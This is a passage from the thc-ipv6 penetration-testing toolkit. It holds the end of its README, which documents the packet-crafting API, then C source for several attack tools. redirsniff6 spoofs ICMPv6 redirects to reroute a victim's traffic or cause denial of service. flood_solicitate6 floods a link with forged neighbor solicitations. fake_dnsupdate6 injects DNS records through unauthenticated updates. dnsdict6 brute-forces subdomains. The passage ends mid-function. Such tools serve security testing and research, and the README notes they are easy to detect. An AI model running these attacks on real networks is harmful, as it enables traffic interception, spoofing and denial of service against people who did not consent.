hdropt); thc_add_hdr_misc(my_ipv6_packet, &my_ipv6_packet_len, type, len, buf, buflen); The functions explained: _route: Add a Routing Forwarding Header (like IP Source Routing) (int) routers - the number of routers in routerptr (char**) routerptr - a *char[routers + 1] struct with router destinations in network format. See alive6.c for an example. _fragment: Add a Fragment Header (int) offset - the offset on which to the data should be written (note: put the offset location in bytes here, not in byte octets) (int) more_frags - set to 0 if it is the fragement, 1 on all others (int) id - an ID for the packet (same for all fragments) _dst: Add a Destination Options Header (char*) buf - a char buffer. you have to control this buffer yourself with but you want to write into it. (int) buflen - the length of buf _hopbyhop: Add a Hop-By-Hop Header (char*) buf - a char buffer. you have to control this buffer yourself with but you want to write into it. (int) buflen - the length of buf _nonxt: Specify that there will be no following headers whatsoever (int) hdropt - this options is currently ignored _misc: Specify a miscelleanous header. Use this if you want to design an invalid or non-existing extension header. (int) type - The type ID to specify the header as (int) len - The length to advertise the header as (OPTIONAL - -1 sets this to the correct value) (char*) buf - a char buffer. you have to control this buffer yourself with but you want to write into it. (int) buflen - the length of buf These functions return (int) 0 on success and -1 on error. Finally you can add the stream or dgram headers. thc_add_icmp6(my_ipv6_packet, &my_ipv6_packet_len, type, code, flags, buf, buflen, checksum); thc_add_tcp(my_ipv6_packet, &my_ipv6_packet_len, source_port, destination_port, sequence_number, ack_number, flags, window_size urgent_pointer, options, optione_length, data, data_length); thc_add_udp(my_ipv6_packet, &my_ipv6_packet_len, source_port, destination_port, checksum, data, data_length); thc_add_data6(my_ipv6_packet, &my_ipv6_packet_len, type, buf, buflen); _icmp6: Add an ICMP6 packet header (int) type: the ICMP6 type (int) code: the ICMP6 code (int) flags: the ICMP6 flags (char*) buf - a char buffer. you have to control this buffer yourself with but you want to write into it. (int) buflen - the length of buf _tcp|_udp: Add an TCP or UDP header (ushort) source_port: source port (ushort) destination_port: destination port (uint) sequence_number: TCP sequence number (uint) ack_number: TCP acknowledgement number (ushort) checksum: UDP checksum, 0 = generate checksum (for TCP the checksum is always calculated) (uchar) flags: TCP flags: TCP_SYN, TCP_ACK, TCP_FIN, TCP_RST, TCP_PSH, ... (uint) window_size: TCP window size (uint) urgent_pointer: TCP urgent pointer (usually 0) (char*) options: TCP options buffer, can be NULL (uint) options_length: the length of the TCP options buffer (char*) data: the data the protocol carries (uint) data_length: the length of the data buffer _data6: Add a miscellaneous header (int) type: the protocol ID (char*) buf - a char buffer. you have to control this buffer yourself with but you want to write into it. (int) buflen - the length of buf These functions return (int) 0 on success and -1 on error. Once you are done, you create and send the packet. thc_generate_pkt(interface, srcmac, dstmac, my_ipv6_packet, &my_ipv6_packet_len); thc_send_pkt(interface, my_ipv6_packet, &my_ipv6_packet_len); or combined into one function: thc_generate_and_send_pkt(interface, srcmac, dstmac, my_ipv6_packet, &my_ipv6_packet_len); thc_generate_and_send_pkt: This generates the real and final IPv6 packet and then sends it. (char*) interface - the interface to send the packet on (unsigned char*) srcmac - the source mac to use (in network format) (OPTIONAL, the real mac is used if NULL) (unsigned char*) dstmac - the destination mac to use (in network format) (OPTIONAL, the real mac is looked up if NULL) The thc_generate_pkt and thc_send_pkt together provide the same functionality. You usually use these only if you do something like thc_generate_pkt(...); while(1) thc_send_pkt(...); These functions return (int) 0 on success and -1 on error. When you are done, free the memory with: thc_destroy_packet(my_ipv6_packet); There are some important helper functions you will need: thc_resolve6(destinationstring); This resolves the IPv6 address or DNS name to an IPv6 network address. Use this for dst6 in thc_create_ipv6_extended(). The result has to be free'd when not needed anymore. thc_inverse_packet(my_ipv6_packet, &my_ipv6_packet_len); This clever functions switches source and destination address, exchanges the ICMP header type (ECHO REQUEST -> ECHO REPLY etc.) and recalculates the checksum. If you dont have an idea what this might be useful for, go and play with your xbox :-) If you just want to do it very fast, there are some predefined ICMPv6 creator functions which sends impc6 packets in just one line of code: thc_ping6(interface, src, dst, size, count); thc_neighboradv6(interface, src, dst, srcmac, dstmac, flags, target); thc_neighborsol6(interface, src, dst, target, srcmac, dstmac); thc_routeradv6(interface, src, dst, srcmac, default_ttl, managed, prefix, prefixlen, mtu, lifetime); thc_routersol6(interface, src, dst, srcmac, dstmac); thc_toobig6(interface, src, srcmac, dstmac, mtu, my_ipv6_packet, my_ipv6_packet_len); thc_paramprob6(interface, src, srcmac, dstmac, code, pointer, my_ipv6_packet, my_ipv6_packet_len); thc_unreach6(interface, src, srcmac, dstmac, icmpcode, my_ipv6_packet, my_ipv6_packet_len); thc_redir6(interface, src, srcmac, dstmac, newrouter, newroutermac, my_ipv6_packet, my_ipv6_packet_len); thc_send_as_fragment6(interface, src, dst, type, buf, buflen, frag_len); These do what you expect them to do, so I am too lazy^H^H^H^H^Hbusy to describe it in more details. The following functions allocate memory for the result pointer, so remember to free the result pointers from these functions once you do not need them anymore: thc_ipv6_dummymac() thc_ipv62notation() thc_ipv62string() thc_string2ipv6() thc_string2notation() thc_resolve6() thc_get_own_ipv6() thc_get_own_mac() thc_get_multicast_mac() thc_get_mac() thc_lookup_ipv6_mac() thc_look_neighborcache() thc_generate_key() thc_generate_cga() thc_generate_rsa() It helps a lot if you take a look at example usages. The best ones are the tools from the thc-ipv6 package, especially implementation6.c and fake_*6.c - have fun, and send back code, so the community can further build on it. DETECTION ========= Most tools can easily be detected by an IDS or specialized detection software. This is done on purpose to make rogue usage detection easier. The tools either specify a fixed packet signature, or generically sniff for packets (e.g. therefore also answering to ICMPv6 neighbor solitications which are sent to a non-existing mac, and are therefore very easy to detect). If you dont want this, change the code. PATCHES, BUGS, HINTS, etc. ========================== Send them to vh (at) thc (dot) org (and add "antispam" to the subject line) Have fun! thc-ipv6-2.5/redirsniff6.c0000644000000000000000000001115612251022440014077 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" unsigned char *pkt = NULL, buf[16], mac[16] = "", *realownmac; unsigned char *mac6 = mac, *src6, *dest6, *oldrouter6, *newrouter6, *self6, *fakemac; char *interface; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface victim-ip destination-ip original-router [new-router [new-router-mac]]\n\n", prg); printf("Implant a route into victim-ip, which redirects all traffic to destination-ip to\n"); printf("new-router. This is done on all traffic that flows by that matches\n"); printf("victim->target. You must know the router which would handle the route.\n"); printf("If the new-router/-mac does not exist, this results in a DOS.\n"); printf("You can supply a wildcard ('*') for victim-ip and/or destination-ip.\n"); exit(-1); } void intercept(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { char *ptr, *ptr2; // packet is to the real router, and is not from us? if (memcmp(realownmac, data + 6, 6) == 0 || memcmp(fakemac, data, 6) != 0) return; // check that source and dest are routed // same network? if (memcmp(data + 14 + 8, data + 14 + 8 + 16, 8) == 0) return; // dst fe.. or ff.. or 00? if (data[14 + 8 + 16] >= 0xfe || data[14 + 8 + 16] == 0) return; // src fe.. or ff.. or 00? if (data[14 + 8 + 16] >= 0xfe || data[14 + 8 + 16] == 0) return; if (src6 != NULL) { // victim wildcard? if not, check src if (memcmp(src6, data + 14 + 8, 16) != 0) return; } else { // victim wildcard - we have to ensure that the source is local -> hop count! if (data[14 + 7] != 64 && data[14 + 7] != 128 && data[14 + 7] != 255) return; } if (dest6 != NULL) // destination wildcard? if not, check dst if (memcmp(dest6, data + 14 + 8 + 16, 16) != 0) return; thc_redir6(interface, oldrouter6, fakemac, (unsigned char*)data + 6, newrouter6, mac6, (unsigned char*)data + 14, header->caplen - 14); ptr = thc_ipv62notation((unsigned char*)data + 14 + 8); ptr2 = thc_ipv62notation((unsigned char*)data + 14 + 8 + 16); printf("Sent ICMPv6 redirect for %s -> %s\n", ptr, ptr2); free(ptr); free(ptr2); } int main(int argc, char *argv[]) { int rawmode = 0, offset = 14; char string[256] = "ip6"; if (argc < 5 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } if (do_hdr_size) offset = do_hdr_size; interface = argv[1]; if ((src6 = thc_resolve6(argv[2])) == NULL) { if (strcmp(argv[2], "*") != 0) { fprintf(stderr, "Error: victim-ip is not a valid IPv6 address or '*': %s\n", argv[2]); exit(-1); } } if ((dest6 = thc_resolve6(argv[3])) == NULL) { if (strcmp(argv[3], "*") != 0) { fprintf(stderr, "Error: destination-ip is not a valid IPv6 address or '*': %s\n", argv[3]); exit(-1); } } if ((oldrouter6 = thc_resolve6(argv[4])) == NULL) { fprintf(stderr, "Error: old-router is not a valid IPv6 address: %s\n", argv[4]); exit(-1); } if (argc >= 6) { if ((newrouter6 = thc_resolve6(argv[5])) == NULL) { fprintf(stderr, "Error: new-router is not a valid IPv6 address: %s\n", argv[5]); exit(-1); } } else newrouter6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK); /* Spoof source mac */ if ((self6 = thc_get_own_ipv6(interface, oldrouter6, PREFER_GLOBAL)) == NULL) { fprintf(stderr, "Error: could not get own IP address to contact original-router\n"); exit(-1); } if ((fakemac = thc_get_mac(interface, self6, oldrouter6)) == NULL) { fprintf(stderr, "Error: could not resolve mac address for original-router\n"); free(self6); exit(-1); } mac6 = mac; if (argc >= 7) sscanf(argv[6], "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4], (unsigned int *) &mac[5]); else mac6 = thc_get_own_mac(interface); realownmac = thc_get_own_mac(interface); if (src6 != NULL) { strcat(string, " and src "); strcat(string, thc_ipv62notation(src6)); } if (dest6 != NULL) { strcat(string, " and dst "); strcat(string, thc_ipv62notation(dest6)); } printf("Starting sniffer to get traffic to be redirected (press Control-C to end) ...\n"); return thc_pcap_function(interface, string, (char *) intercept, 1, NULL); } thc-ipv6-2.5/flood_solicitate6.c0000644000000000000000000000554512251022437015302 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface [target]\n\n", prg); printf("Flood the network with neighbor solicitations.\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } int main(int argc, char *argv[]) { char *interface, mac[6] = ""; unsigned char *mac6 = mac, *ip6; unsigned char buf[24]; unsigned char *dst = thc_resolve6("ff02::1"), *dstmac = thc_get_multicast_mac(dst), *target = NULL; int i; unsigned char *pkt = NULL; int pkt_len = 0, rawmode = 0, count = 0; if (argc < 2 || argc > 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]); if (strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } srand(time(NULL) + getpid()); setvbuf(stdout, NULL, _IONBF, 0); interface = argv[1]; if (thc_get_own_mac(interface) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } if (argc > 2) if ((target = thc_resolve6(argv[2])) == NULL) { fprintf(stderr, "Error: Can not resolve %s\n", argv[2]); exit(-1); } ip6 = malloc(16); mac[0] = 0x00; mac[1] = 0x18; memset(ip6, 0, 16); ip6[0] = 0xfe; ip6[1] = 0x80; ip6[8] = 0x02; ip6[9] = mac[1]; ip6[11] = 0xff; ip6[12] = 0xfe; memset(buf, 0, sizeof(buf)); buf[16] = 1; buf[17] = 1; buf[18] = mac[0]; buf[19] = mac[1]; if (target != NULL) memcpy(buf, target, 16); printf("Starting to flood network with neighbor solicitations on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface); while (1) { // use previous src as target if we did not specify a target if (target == NULL) memcpy(buf, ip6, 16); for (i = 2; i < 6; i++) mac[i] = rand() % 256; ip6[10] = mac[2]; ip6[13] = mac[3]; ip6[14] = mac[4]; ip6[15] = mac[5]; memcpy(&buf[20], mac + 2, 4); count++; if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORSOL, 0, 0, buf, sizeof(buf), 0) < 0) return -1; if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) { // fprintf(stderr, "Error sending packet no. %d on interface %s: ", count, interface); // perror(""); // return -1; printf("!"); } pkt = thc_destroy_packet(pkt); // usleep(1); if (count % 1000 == 0) printf("."); } return 0; } thc-ipv6-2.5/fake_dnsupdate6.c0000644000000000000000000000665012251022435014730 0ustar rootroot#include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void noreply(int signo) { printf("Result: DNS server timeout\n"); exit(1); } int main(int argc, char **argv) { char buf[1024], *dst, *host, *domain, *ptr, *ptr2; char b1[] = { 0x28, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00 }; char b2[] = { 0x00, 0x06, 0x00, 0x01 }; char b3[] = { 0xc0, 0x0c, 0x00, 0x1c, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; char b4[] = { 0xc0, 0x00, 0x00, 0x1c, 0x00, 0x01, 0x00, 0x01, 0x51, 0x80, 0x00, 0x10 }; struct addrinfo *ai; struct addrinfo hints; int sock, pid = getpid(), dlen = 0, i = 0, len; if (argc != 4) { printf("%s %s (c) 2013 by %s %s\n\n", argv[0], VERSION, AUTHOR, RESOURCE); printf("Syntax: %s dns-server full-qualified-host-dns-name ipv6address\n\n", argv[0]); printf("Example: %s dns.test.com myhost.sub.test.com ::1\n\n", argv[0]); exit(0); } if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]); memset(&hints, 0, sizeof(struct addrinfo)); hints.ai_family = AF_UNSPEC; hints.ai_socktype = SOCK_DGRAM; hints.ai_protocol = IPPROTO_UDP; if (getaddrinfo(argv[1], "53", &hints, &ai) != 0) { fprintf(stderr, "Error: unable to resolve dns server %s\n", argv[1]); exit(-1); } if ((sock = socket(ai->ai_family, ai->ai_socktype, ai->ai_protocol)) < 0) { fprintf(stderr, "Error: unable to resolve dns server %s\n", argv[1]); exit(-1); } if (connect(sock, ai->ai_addr, ai->ai_addrlen) < 0) { fprintf(stderr, "Error: unable to connect to dns server %s\n", argv[1]); exit(-1); } freeaddrinfo(ai); if ((dst = thc_resolve6(argv[3])) == NULL) { fprintf(stderr, "Error: not a valid IPv6 address: %s\n", argv[3]); exit(-1); } memcpy(buf, (char *) &pid + _TAKE2, 2); memcpy(buf + 2, b1, sizeof(b1)); i = 2 + sizeof(b1); // domain-encoded-here foo.com == \x03foo\x03com\x00 == dlen host = argv[2]; if ((domain = index(argv[2], '.')) == NULL) { fprintf(stderr, "Error: not a valid full-qualified-host-name: %s\n", argv[2]); exit(-1); } *domain = 0; ptr = domain; do { ptr++; if ((ptr2 = index(ptr, '.')) != NULL) *ptr2 = 0; len = strlen(ptr); buf[i++] = len; memcpy(buf + i, ptr, len); i += len; dlen += (len + 1); ptr = ptr2; } while (ptr != NULL); buf[i++] = 0; dlen++; memcpy(buf + i, b2, sizeof(b2)); i += sizeof(b2); // host-encoded len = strlen(host); buf[i++] = len; memcpy(buf + i, host, len); i += len; memcpy(buf + i, b3, sizeof(b3)); i += sizeof(b3); b4[1] = dlen + 16; memcpy(buf + i, b4, sizeof(b4)); i += sizeof(b4); memcpy(buf + i, dst, 16); i += 16; send(sock, buf, i, 0); signal(SIGALRM, noreply); alarm(5); memset(buf, 0, sizeof(buf)); recv(sock, buf, sizeof(buf), 0); alarm(0); if ((buf[3] & 9) == 9) { printf("Result: server not responsible for zone or update not supported\n"); exit(1); } else if ((buf[3] & 15) == 1) { printf("Result: authentication required, update attempt failed\n"); exit(1); } else if ((buf[3] & 1) == 1) { printf("Result: unknown error, update attempt failed\n"); exit(1); } else printf("Result: update successful!\n"); close(sock); return 0; } thc-ipv6-2.5/dnsdict6.c0000644000000000000000000007011712251022434013401 0ustar rootroot/* * dnsdict6 is actually based on dnsmap with four changes: * - threaded (way faster) * - bugfixes * - ipv6 support * - simplified options * - srv support * have fun! van Hauser / THC, May 2013 * * ** dnsmap - DNS Network Mapper by pagvac * ** Copyright (C) 2013 gnucitizen.org */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" #include "dnsdict6.h" // built-in subdomains list //#define DEBUG 1 #define FALSE 0 #define TRUE 1 #define MAXSTRSIZE 200 #define DEFAULT_THREADS 8 #define MAX_THREADS 32 #define MAX_UNIQUE 4096 #define MAX_WCARD 8 char domain[256]; unsigned short int filtIPcount = 0, milliseconds = 10, ipCount = 0, ipCount4; unsigned short int intIPcount = 0, found = 0, txtResults = FALSE, do4 = 0, do6 = 1, dof = 0, dosrv = 0; unsigned short int csvResults = FALSE, delay = FALSE, ucount = 0, ucount4 = 0, ucountsrv = 0, ucountsrvs = 0, wcard = 0, wcard4 = 0; char wildcardIpStr[MAX_WCARD][INET_ADDRSTRLEN], wildcardIpStr4[MAX_WCARD][16], unique[MAX_UNIQUE][INET_ADDRSTRLEN], unique4[MAX_UNIQUE][16]; char **sub = (char **) sub_medium, *type = ""; char ***lists; unsigned short int listptr[MAX_THREADS]; void *help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-d4] [-s|-m|-l|-x|-u] [-t THREADS] [-D] domain [dictionary-file]\n\n", prg); printf("Enumerates a domain for DNS entries, it uses a dictionary file if supplied\n"); printf("or a built-in list otherwise. This tool is based on dnsmap by gnucitizen.org.\n\n"); printf("Options:\n"); // printf(" -6 do NOT dump IPv6 addresses\n"); printf(" -4 do also dump IPv4 addresses\n"); printf(" -t NO specify the number of threads to use (default: %d, max: %d).\n", DEFAULT_THREADS, MAX_THREADS); printf(" -D dump the selected built-in wordlist, no scanning.\n"); printf(" -d display IPv6 information on NS and MX DNS domain information.\n"); printf(" -S perform SRV service name guessing\n"); printf(" -[smlxu] choose the dictionary size by -s(mall=100), -m(edium=1419) (DEFAULT)\n"); printf(" -l(arge=2601), -x(treme=5886) or -u(ber=16724)\n"); printf("\n"); exit(-1); } // return true if the domain seems valid (NS entry exists) int verifyDomain(char *dom) { unsigned char vbuf[1024]; if (res_query(dom, ns_c_in, ns_t_ns, vbuf, sizeof(vbuf)) >= 0) return TRUE; return FALSE; } // return true if domain wildcards are enabled unsigned short int wildcarDetect(char *dom) { char s[MAXSTRSIZE] = ""; unsigned short int i = 0, j, k, max = 8; struct addrinfo hints, *res, *p; void *addr, *addr4; int status; char ipv6str[INET6_ADDRSTRLEN]; char ipv4str[16]; struct sockaddr_in6 *ipv6, *q; struct sockaddr_in *ipv4, *q4; memset(&hints, 0, sizeof hints); hints.ai_family = dof; // AF_INET or AF_INET6 to force version srand(time(NULL)); // generate up to random digits subdomain string // e.g. 06312580442146732554 for (i = 0; i < max; ++i) s[i] = '0' + (rand() % 10); s[max] = 0; strcat(s, "0193."); strcat(s, dom); #if DEBUG printf("random subdomain for wildcard testing: %s\n", s); #endif // random subdomain resolves, thus wildcards are enabled if ((status = getaddrinfo(s, NULL, &hints, &res)) == 0) { fprintf(stderr, "Warning: wildcard domain configured\n"); q = NULL; q4 = NULL; for (p = res; p != NULL; p = p->ai_next) { if (do6 && p->ai_family == AF_INET6) { // IPv6 ipv6 = (struct sockaddr_in6 *) p->ai_addr; addr = &(ipv6->sin6_addr); if (q == NULL || memcmp(&ipv6->sin6_addr, &q->sin6_addr, 16) != 0) { q = ipv6; if (wcard < MAX_WCARD) { memcpy(wildcardIpStr[wcard], addr, 16); wcard++; } inet_ntop(p->ai_family, addr, ipv6str, sizeof ipv6str); printf("*.%s => %s\n", dom, ipv6str); } } else if (do4 && p->ai_family == AF_INET) { ipv4 = (struct sockaddr_in *) p->ai_addr; addr4 = &(ipv4->sin_addr); if (q4 == NULL || memcmp(&ipv4->sin_addr, &q4->sin_addr, 4) != 0) { q4 = ipv4; if (wcard4 < MAX_WCARD) { memcpy(wildcardIpStr4[wcard4], addr4, 4); wcard4++; } inet_ntop(p->ai_family, addr4, ipv4str, sizeof ipv4str); printf("*.%s -> %s\n", dom, ipv4str); } } } freeaddrinfo(res); } for (i = 0; i < max; ++i) s[i] = 'a' + (rand() % 26); s[max] = 'y'; s[max + 1] = 'c'; s[max + 2] = 'a'; s[max + 3] = 'y'; #if DEBUG printf("random subdomain for wildcard testing: %s\n", s); #endif // random subdomain resolves, thus wildcards are enabled if ((status = getaddrinfo(s, NULL, &hints, &res)) == 0) { if (wcard == 0) fprintf(stderr, "Warning: wildcard domain configured (2nd test)\n"); q = NULL; q4 = NULL; for (p = res; p != NULL; p = p->ai_next) { if (do6 && p->ai_family == AF_INET6) { // IPv6 ipv6 = (struct sockaddr_in6 *) p->ai_addr; addr = &(ipv6->sin6_addr); if (q == NULL || memcmp(&ipv6->sin6_addr, &q->sin6_addr, 16) != 0) { q = ipv6; if (wcard < MAX_WCARD) { k = 1; if (wcard > 0) for (j = 0; j < wcard; j++) if (memcmp(wildcardIpStr[j], addr, 16) == 0) k = 0; if (k) { memcpy(wildcardIpStr[wcard], addr, 16); wcard++; inet_ntop(p->ai_family, addr, ipv6str, sizeof ipv6str); printf("*.%s => %s\n", dom, ipv6str); } } } } else if (do4 && p->ai_family == AF_INET) { ipv4 = (struct sockaddr_in *) p->ai_addr; addr4 = &(ipv4->sin_addr); if (q4 == NULL || memcmp(&ipv4->sin_addr, &q4->sin_addr, 4) != 0) { q4 = ipv4; if (wcard4 < MAX_WCARD) { k = 1; if (wcard4 > 0) for (j = 0; j < wcard4; j++) if (memcmp(wildcardIpStr4[j], addr4, 4) == 0) k = 0; if (k) { memcpy(wildcardIpStr4[wcard4], addr4, 4); wcard4++; inet_ntop(p->ai_family, addr4, ipv4str, sizeof ipv4str); printf("*.%s -> %s\n", dom, ipv4str); } } } } } freeaddrinfo(res); } if (wcard) return TRUE; else return FALSE; } // return number of milliseconds delayed unsigned short int dodelay(unsigned short int maxmillisecs) { unsigned short int n = 0; srand(time(NULL)); n = rand() % maxmillisecs; ++n; maxmillisecs = n; #if DEBUG printf("sleeping %d milliseconds ...\n", maxmillisecs); #endif usleep(maxmillisecs * 1000); return maxmillisecs; } // return true if domain is valid, false otherwise int isValidDomain(char *d) { unsigned int i = 0; char *tld; size_t len; if (d[strlen(d) - 1] == '.') d[strlen(d) - 1] = 0; if (strlen(d) < 4) // smallest possible domain provided. e.g. a.de return FALSE; if (!strstr(d, ".")) // target domain must have at least one dot. e.g. target.va, branch.target.va return FALSE; if (strlen(d) > 100) return FALSE; tld = strstr(d, "."); tld = tld + 1; while (strstr(tld, ".")) { tld = strstr(tld, "."); tld = tld + 1; } #if DEBUG printf("tld\'s length: %d\n", strlen(tld)); printf("dom: %s tld: %s\n", d, tld); #endif if ((strlen(tld) < 2) || (strlen(tld) > 6)) // tld must be between 2-6 char. e.g. .museum, .uk return FALSE; // valid domain can only contain digits, letters, dot (.) and dash symbol (-) len = strlen(d); for (i = 0; i < len; ++i) { if (!(d[i] >= '0' && d[i] <= '9') && !(d[i] >= 'a' && d[i] <= 'z') && !(d[i] >= 'A' && d[i] <= 'Z') && !(d[i] >= '-' && d[i] <= '.')) return FALSE; } return TRUE; } void threaded_resolve(char *list[]) { int i = 0, j, k; char dom[MAXSTRSIZE] = "", *foo = "", buf[1024]; void *addr, *addr4; struct addrinfo hints, *res, *p; int status, found2; char ipv6str[INET6_ADDRSTRLEN], ipv4str[16]; struct sockaddr_in6 *ipv6, *q; struct sockaddr_in *ipv4, *q4; memset(&hints, 0, sizeof hints); hints.ai_family = dof; // AF_INET or AF_INET6 to force version if (type == NULL) type = foo; i = 0; while (list[i] != NULL && list[i][0] != 0) { snprintf(dom, sizeof(dom), "%s.%s", list[i], domain); #if DEBUG printf("brute-forced domain: %s\n", dom); #endif // ipv6 code modded from www.kame.net if ((status = getaddrinfo(dom, NULL, &hints, &res)) == 0) { q = NULL; q4 = NULL; found2 = 0; for (p = res; p != NULL; p = p->ai_next) { if (do6 && p->ai_family == AF_INET6) { // IPv6 ipv6 = (struct sockaddr_in6 *) p->ai_addr; addr = &(ipv6->sin6_addr); // convert the IP to a string and print it: if (q == NULL || memcmp(&ipv6->sin6_addr, &q->sin6_addr, 16) != 0) { q = ipv6; k = 1; if (wcard) for (j = 0; j < wcard; j++) if (memcmp(addr, wildcardIpStr[j], 16) == 0) k = 0; if (k) { if (found2 == 0) { ++found; found2 = 1; } inet_ntop(p->ai_family, addr, ipv6str, sizeof ipv6str); sprintf(buf, "%s => %s\n", dom, ipv6str); printf("%s", buf); ++ipCount; if (ucount < MAX_UNIQUE) { if (ucount) for (j = 0; j < ucount; j++) if (memcmp(addr, unique[j], 16) == 0) k = 0; if (k) { memcpy(unique[ucount], addr, 16); ucount++; } } } } } else if (do4 && p->ai_family == AF_INET) { ipv4 = (struct sockaddr_in *) p->ai_addr; addr4 = &(ipv4->sin_addr); if (q4 == NULL || memcmp(&ipv4->sin_addr, &q4->sin_addr, 4) != 0) { q4 = ipv4; k = 1; if (wcard4) for (j = 0; j < wcard4; j++) if (memcmp(wildcardIpStr4[j], addr4, 4) == 0) k = 0; if (k) { if (found2 == 0) { ++found; found2 = 1; } inet_ntop(p->ai_family, addr4, ipv4str, sizeof ipv4str); sprintf(buf, "%s => %s\n", dom, ipv4str); printf("%s", buf); ++ipCount4; if (ucount4 < MAX_UNIQUE) { if (ucount4) for (j = 0; j < ucount4; j++) if (memcmp(addr4, unique4[j], 4) == 0) k = 0; if (k) { memcpy(unique4[ucount4], addr4, 4); ucount4++; } } } } } } freeaddrinfo(res); // free the linked list } // end of if conditional // user wants delay between DNS requests? if (delay) dodelay(milliseconds); i++; } return; } int dnsquerycode(char *sub, char *domain, int type) { char vbuf[256], dom[256]; memset(vbuf, 0, sizeof(vbuf)); snprintf(dom, sizeof(dom), "%s.%s", sub, domain); res_query(dom, ns_c_in, type, vbuf, sizeof(vbuf)); if (vbuf[2] == 0) return -1; else return (vbuf[3] & 15); } void threaded_resolve_srv(char *list[]) { char dom[MAXSTRSIZE] = "", buf[1024]; int len, cnt, i, j, k, found = 0, found1, found4 = 0, found2; unsigned short int *port, *prio, *weight; unsigned char vbuf[1500], *vptr; char dbuf[256]; struct addrinfo hints, *res, *p; struct sockaddr_in6 *ipv6, *q; char ipv6str[INET6_ADDRSTRLEN], ipv4str[16]; struct sockaddr_in *ipv4, *q4; void *addr, *addr4; if (type == NULL) return; memset((char *) &hints, 0, sizeof(hints)); hints.ai_family = dof; i = 0; while (list != NULL && list[i] != NULL && list[i][0] != 0) { snprintf(dom, sizeof(dom), "%s.%s.%s", list[i], type, domain); memset(vbuf, 0, 4); #if DEBUG printf("brute-forced domain: %s\n", dom); #endif if ((len = res_query(dom, ns_c_in, ns_t_srv, vbuf, sizeof(vbuf))) > 0 && (vbuf[3] & 15) == 0 && (cnt = vbuf[7]) > 0) { vptr = vbuf + strlen(dom) + 17; ucountsrv++; for (j = 0; j < cnt && len - (vptr - vbuf) >= 20; j++) { vptr += 10; k = vptr[1] + vptr[0] * 256; vptr += 2; prio = (unsigned short int *) (vptr); weight = (unsigned short int *) (vptr + 2); port = (unsigned short int *) (vptr + 4); dbuf[0] = 0; dn_expand(vbuf, vbuf + len, vptr + 6, dbuf, sizeof(dbuf)); if (getaddrinfo(dbuf, NULL, &hints, &res) == 0) { q = NULL; q4 = NULL; found1 = 0; found2 = 0; for (p = res; p != NULL; p = p->ai_next) { if (do6 && p->ai_family == AF_INET6) { // IPv6 ipv6 = (struct sockaddr_in6 *) p->ai_addr; addr = &(ipv6->sin6_addr); if (q == NULL || memcmp(&ipv6->sin6_addr, &q->sin6_addr, 16) != 0) { q = ipv6; // convert the IP to a string and print it: inet_ntop(p->ai_family, addr, ipv6str, sizeof ipv6str); snprintf(buf, sizeof(buf), "%s => %s is %s port %d %s (prio %d weight %d)\n", dom, dbuf, ipv6str, htons(*port), strcmp(type, "_tcp") == 0 ? "TCP" : "UDP", htons(*prio), htons(*weight)); printf("%s", buf); if (found1 == 0) { ++found; found1 = 1; } } } else if (do4 && p->ai_family == AF_INET) { // IPv4 ipv4 = (struct sockaddr_in *) p->ai_addr; addr4 = &(ipv4->sin_addr); if (q4 == NULL || memcmp(&ipv4->sin_addr, &q4->sin_addr, 4) != 0) { q4 = ipv4; // convert the IP to a string and print it: inet_ntop(p->ai_family, addr4, ipv4str, sizeof ipv4str); snprintf(buf, sizeof(buf), "%s => %s is %s port %d %s (prio %d weight %d)\n", dom, dbuf, ipv4str, htons(*port), strcmp(type, "_tcp") == 0 ? "TCP" : "UDP", htons(*prio), htons(*weight)); printf("%s", buf); if (found2 == 0) { ++found4; found2 = 1; } } } } freeaddrinfo(res); } else { snprintf(buf, sizeof(buf), "%s => %s port %d %s (prio %d weight %d)\n", dom, dbuf, htons(*port), strcmp(type, "_tcp") == 0 ? "TCP" : "UDP", htons(*prio), htons(*weight)); printf("%s", buf); } vptr += k; ucountsrvs++; } } //else printf("srv: %s %d len %d code %d valid\n", dom, len, (vbuf[3] & 15), vbuf[2]); if ((vbuf[3] & 15) == 0 && vbuf[2] > 0) { memset(vbuf, 0, 4); if ((len = res_query(dom, ns_c_in, ns_t_any, vbuf, sizeof(vbuf))) > 0 && (vbuf[3] & 15) == 0 && (cnt = vbuf[7]) > 0) { if ((vbuf[2] & 2) == 2) fprintf(stderr, "Warning: truncated answer for entry \"%s\" type ANY\n", dom); vptr = vbuf + strlen(dom) + 17; ucountsrv++; for (j = 0; j < cnt && len - (vptr - vbuf) >= 20; 